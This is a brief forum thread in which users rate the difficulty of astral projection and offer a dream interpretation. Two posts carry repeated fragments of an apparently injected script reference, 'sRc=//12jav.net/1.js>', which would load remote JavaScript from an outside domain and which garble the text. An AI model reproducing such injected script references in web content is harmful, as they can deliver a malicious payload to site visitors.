How hard is it AP?

On a scale on 1-10 how hard is it for you to Astral Project? For me it is 8.

Also I had this weird dream where I was in a room in my house, I hear this loud bang. I look out a window and I see fire everywhere and then I am at a beach. I see a girl singing near the coastline. Sorry if this is off topic, but what does it mean? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Ap is not hard (everybody does it all the time), to do what you want in that state is the hard part... ^_^ so sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

1 being closing your eyes for 10 minutes and then find yourself floating around; 10 being 6-12 hours of meditation... I would put it around 8 too (6-7 on a good day).

Perhaps your elemental balance is showing in your dreams? I used to have dreams of looking out my window and seeing the whole city burn, too (my whole family was going through pretty hard times and everyone's tempers were on the edge)... more recently I dream of it turning into grassy hills.
